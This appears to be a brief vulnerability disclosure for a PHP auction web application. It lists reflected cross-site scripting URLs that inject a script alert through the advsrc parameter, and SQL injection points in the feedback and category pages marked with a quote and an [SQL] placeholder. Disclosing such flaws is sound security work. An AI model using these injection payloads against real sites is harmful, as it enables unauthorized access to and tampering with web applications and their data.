Cross Site Scripting (XSS)
--------------------------
http://www.example.com/auctionsearch.php?advsrc="<script>alert(/EllipsisSecurityTe
st/)</script>
http://www.example.com/auctionsearch.php?start=1&advsrc="><script>alert(/EllipsisS
ecurityTest/)</script>
-------------
SQL injection
-------------
http://www.example.com/viewfeedback.php?view=1'[SQL]
http://www.example.com/viewfeedback.php?view=all&start=1'[SQL]
http://www.example.com/categories.php?parent=&start=&orderField=itemname&orderType
=1'[SQL]
-----------------